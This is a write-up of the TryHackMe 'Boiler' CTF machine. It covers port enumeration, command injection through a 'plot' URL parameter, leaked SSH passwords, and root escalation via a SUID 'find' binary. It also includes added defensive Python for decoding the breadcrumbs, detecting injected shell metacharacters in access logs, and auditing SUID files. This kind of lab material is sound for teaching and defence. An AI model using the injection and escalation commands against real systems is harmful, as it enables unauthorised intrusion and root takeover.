# TryHackMe-Boiler CTF

## NMAP

```
Host is up (0.15s latency).
Not shown: 997 closed ports
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.14.3.143
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
10000/tcp open  http    MiniServ 1.930 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
55007/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e3:ab:e1:39:2d:95:eb:13:55:16:d6:ce:8d:f9:11:e5 (RSA)
|   256 ae:de:f2:bb:b7:8a:00:70:20:74:56:76:25:c0:df:38 (ECDSA)
|_  256 25:25:83:f2:a7:75:8a:a0:46:b2:12:70:04:68:5c:cb (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https
```

## PORT 21 (FTP)

So `anonymous` login is allowed on FTP, so let's connect:

```
root@kali:~/TryHackMe/Medium/BoilerCTF# ftp 10.10.214.74
Connected to 10.10.214.74.
220 (vsFTPd 3.0.3)
Name (10.10.214.74:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Aug 22  2019 .
drwxr-xr-x    2 ftp      ftp          4096 Aug 22  2019 ..
-rw-r--r--    1 ftp      ftp            74 Aug 21  2019 .info.txt
226 Directory send OK.
ftp> get .info.txt
local: .info.txt remote: .info.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for .info.txt (74 bytes).
226 Transfer complete.
74 bytes received in 0.00 secs (587.5254 kB/s)
ftp> 
```

We find a hidden file named `.info.txt`. This is the content of the file:

```
hfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!
```

Well, this is a rabbit hole, so let's enumerate the other ports.
## PORT 80 (HTTP)

We get the default Apache web page. It is always good to view the page source, and since nmap showed there is a `robots.txt`, let's look for that too. There wasn't anything useful in the source of the web page. Running gobuster, we found some directories:

```
root@kali:~/TryHackMe/Medium/BoilerCTF# gobuster dir -u http://10.10.214.74/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.214.74/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/11/08 23:32:44 Starting gobuster
===============================================================
/manual (Status: 301)
/joomla (Status: 301)
```
I ran gobuster on `/joomla`:

```
root@kali:~/TryHackMe/Medium/BoilerCTF# gobuster dir -u http://10.10.214.74/joomla -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.214.74/joomla
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/11/08 23:35:14 Starting gobuster
===============================================================
/images (Status: 301)
/media (Status: 301)
/templates (Status: 301)
/modules (Status: 301)
/tests (Status: 301)
/bin (Status: 301)
/plugins (Status: 301)
/includes (Status: 301)
/language (Status: 301)
/components (Status: 301)
/cache (Status: 301)
/libraries (Status: 301)
/installation (Status: 301)
/build (Status: 301)
/tmp (Status: 301)
/layouts (Status: 301)
/administrator (Status: 301)
```

I kept this brute force running in the background and focused on enumerating other things. `/administrator` presented us with a login page.

## PORT 10000 (HTTPS)

There is a `webmin` login page, but by answering the question on the room it doesn't seem that we

## Coming back to PORT 80

I saw that my gobuster had returned some more directories:

```
/cli (Status: 301)
/_files (Status: 301)
```

`/cli` was empty, but `/_files` was interesting. This time I used `ciphey` (if you want to install it: https://github.com/Ciphey/Ciphey), and this was nothing but a rabbit hole again :D

```
root@kali:~/TryHackMe/Medium/BoilerCTF# ciphey -t VjJodmNITnBaU0JrWVdsemVRbz0K
Result 'Whopsie daisy\n' (y/N): y
Format used:
  base64
  utf8
  base64
  utf8
Final result: "Whopsie daisy"
```
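Both breadcrumbs so far, the ROT13 note from the FTP share and the double-base64 string that ciphey unwrapped from `/_files`, are layered textbook encodings. The following Python is an added example (not from the original writeup and not ciphey's code) that peels such layers offline: each round tries base64 first and falls back to ROT13, keeping the ROT13 step only when the result scores better as English. The small word list used for scoring is a constructed heuristic, not a real language model.

```python
import base64
import codecs
import re

# Constructed samples: the two breadcrumbs quoted in this writeup.
FTP_NOTE = "hfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!"
FILES_BLOB = "VjJodmNITnBaU0JrWVdsemVRbz0K"

# Assumption: a handful of common English words is enough to tell
# plaintext from ROT13 text for short notes like these.
COMMON_WORDS = {"the", "to", "if", "you", "it", "is", "key", "see", "find", "and", "of", "daisy"}

def english_score(text):
    """Count common English words in the text (higher means more readable)."""
    return sum(1 for w in re.findall(r"[a-z]+", text.lower()) if w in COMMON_WORDS)

def try_base64(text):
    """Return the UTF-8 text behind a base64 string, or None if it is not base64."""
    s = text.strip()
    if len(s) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s):
        return None
    try:
        return base64.b64decode(s, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None

def peel(text, max_layers=5):
    """Peel encoding layers one at a time; return (plaintext, list of layer names).

    Each round tries base64 first and falls back to ROT13, keeping the ROT13
    step only when it makes the text score better as English.
    """
    layers = []
    for _ in range(max_layers):
        decoded = try_base64(text)
        if decoded is not None:
            layers.append("base64")
            text = decoded
            continue
        rotated = codecs.decode(text, "rot13")
        if english_score(rotated) > english_score(text):
            layers.append("rot13")
            text = rotated
            continue
        break  # nothing more to peel
    return text, layers
```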
I ran directory brute-forcing again, this time with `big.txt`:

```
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.214.74/joomla
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/11/09 00:37:20 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/_archive (Status: 301)
/_database (Status: 301)
/_files (Status: 301)
/_test (Status: 301)
/administrator (Status: 301)
/bin (Status: 301)
/build (Status: 301)
/cache (Status: 301)
/cli (Status: 301)
/components (Status: 301)
/images (Status: 301)
/includes (Status: 301)
/language (Status: 301)
/layouts (Status: 301)
/libraries (Status: 301)
/media (Status: 301)
/modules (Status: 301)
/plugins (Status: 301)
/robots.txt (Status: 200)
```

This time it found `_archive`, `_test` and `_files`, so let's visit those. On this page we can run commands through the `plot` parameter, for example `?plot=LINUX;ls`, which lists the files in that directory, and so we can read `log.txt`. From that file we can find SSH credentials:

```
basterd:superduperp@$$
```
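From the defender's side, a request carrying `?plot=LINUX;ls` is exactly what should trip a detection. The following Python is an added example (not part of the writeup) that scans Apache combined-format access log lines for query parameters whose decoded value contains shell metacharacters; the log lines, client address and the `/joomla/_test/index.php` path are constructed for the example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache combined-log sample. The client address and the
# /joomla/_test/index.php path are made up; ?plot=LINUX;ls is the pattern
# from the writeup, once plain and once percent-encoded.
SAMPLE_LOG = """\
10.10.14.3 - - [09/Nov/2020:00:41:12 +0000] "GET /joomla/_test/index.php?plot=LINUX HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.10.14.3 - - [09/Nov/2020:00:41:40 +0000] "GET /joomla/_test/index.php?plot=LINUX;ls HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.10.14.3 - - [09/Nov/2020:00:42:05 +0000] "GET /joomla/_test/index.php?plot=LINUX%3Bcat%20log.txt HTTP/1.1" 200 512 "-" "curl/7.72.0"
10.10.14.3 - - [09/Nov/2020:00:42:30 +0000] "GET /robots.txt HTTP/1.1" 200 32 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "method target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# Shell metacharacters that have no business in a value like plot=LINUX.
META_RE = re.compile(r"[;|&`]|\$\(")

def parse_query(query):
    """Split a raw query string into decoded (name, value) pairs.

    Splits on '&' only and decodes afterwards, so an encoded ';' (%3B) or
    '&' (%26) ends up inside the value where the metacharacter check sees it.
    """
    pairs = []
    for chunk in query.split("&"):
        if chunk:
            name, _, value = chunk.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs

def suspicious_params(target):
    """Return (name, value) pairs whose decoded value contains shell metacharacters."""
    return [(n, v) for n, v in parse_query(urlsplit(target).query) if META_RE.search(v)]

def scan(log_text):
    """Scan access-log text and return one finding dict per suspicious parameter."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        for name, value in suspicious_params(m["target"]):
            findings.append({"ip": m["ip"], "time": m["ts"], "param": name,
                             "value": value, "status": int(m["status"])})
    return findings
```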
## PORT 55007 (SSH)

On viewing `backup.sh` we can find `stoner`'s password: `superduperp@$$no1knows`.

Checking for SUID binaries, we found:

```
stoner@Vulnerable:/home/basterd$ find / -perm /4000 2>/dev/null
/bin/su
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping6
/bin/ping
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/apache2/suexec-custom
/usr/lib/apache2/suexec-pristine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgidmap
/usr/bin/find
/usr/bin/at
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/newuidmap
```

`find` can be used to escalate privileges. First I tried to set the SUID bit on `/bin/bash`, but that failed; then I added `stoner` to the `sudo` group through `find -exec`, and that worked. After switching to `stoner` again (so the new group membership takes effect), we can run `bash` as `root`:

```
stoner@Vulnerable:/home/basterd$ find . -exec chmod+s /bin/bash
find: missing argument to `-exec'
stoner@Vulnerable:/home/basterd$ find . -exec usermod -aG sudo stoner \;
stoner@Vulnerable:/home/basterd$ sudo bash
[sudo] password for stoner: 
Sorry, try again.
[sudo] password for stoner: 
Sorry, user stoner is not allowed to execute '/bin/bash' as root on Vulnerable.
stoner@Vulnerable:/home/basterd$ whoami
stoner
stoner@Vulnerable:/home/basterd$ sudo -l
User stoner may run the following commands on Vulnerable:
    (root) NOPASSWD: /NotThisTime/MessinWithYa
stoner@Vulnerable:/home/basterd$ su stoner
Password: 
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

stoner@Vulnerable:/home/basterd$ sudo bash
[sudo] password for stoner: 
root@Vulnerable:/home/basterd# 
```
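The root cause of this escalation is a single non-standard SUID binary (`find`) hiding in an otherwise normal list, which is what a SUID audit should catch. The following Python is an added example (not part of the writeup) that collects SUID files from a host and diffs them against a baseline; the baseline set is an assumption approximating a stock Ubuntu 16.04 install, and the constructed input is the listing above.

```python
import os
import stat

# Constructed input: the `find / -perm /4000` listing from this writeup,
# whitespace-separated here to keep the sample short.
SUID_OUTPUT = """
/bin/su /bin/fusermount /bin/umount /bin/mount /bin/ping6 /bin/ping
/usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/apache2/suexec-custom
/usr/lib/apache2/suexec-pristine /usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/bin/newgidmap
/usr/bin/find /usr/bin/at /usr/bin/chsh /usr/bin/chfn /usr/bin/passwd
/usr/bin/newgrp /usr/bin/sudo /usr/bin/pkexec /usr/bin/gpasswd /usr/bin/newuidmap
"""

# Assumption: approximate SUID set of a stock Ubuntu 16.04 install. For real
# audits, generate the baseline from a known-good image of the same build.
BASELINE = {
    "/bin/su", "/bin/fusermount", "/bin/umount", "/bin/mount", "/bin/ping6", "/bin/ping",
    "/usr/lib/policykit-1/polkit-agent-helper-1", "/usr/lib/apache2/suexec-custom",
    "/usr/lib/apache2/suexec-pristine", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/eject/dmcrypt-get-device", "/usr/bin/at",
    "/usr/bin/newgidmap", "/usr/bin/newuidmap", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/sudo", "/usr/bin/pkexec", "/usr/bin/gpasswd",
}

def parse_suid_list(text):
    """Turn saved `find -perm /4000` output (any whitespace separation) into a path list."""
    return [tok for tok in text.split() if tok.startswith("/")]

def collect_suid(root="/"):
    """Walk a filesystem tree and return sorted regular files with the SUID bit set."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)

def audit(paths, baseline=BASELINE):
    """Return (unexpected, missing): SUID files outside the baseline, and baseline entries absent."""
    found = set(paths)
    return sorted(found - baseline), sorted(baseline - found)
```

On a live host, `audit(collect_suid("/"))` replaces the saved listing; anything in the `unexpected` list deserves a look before an attacker finds it.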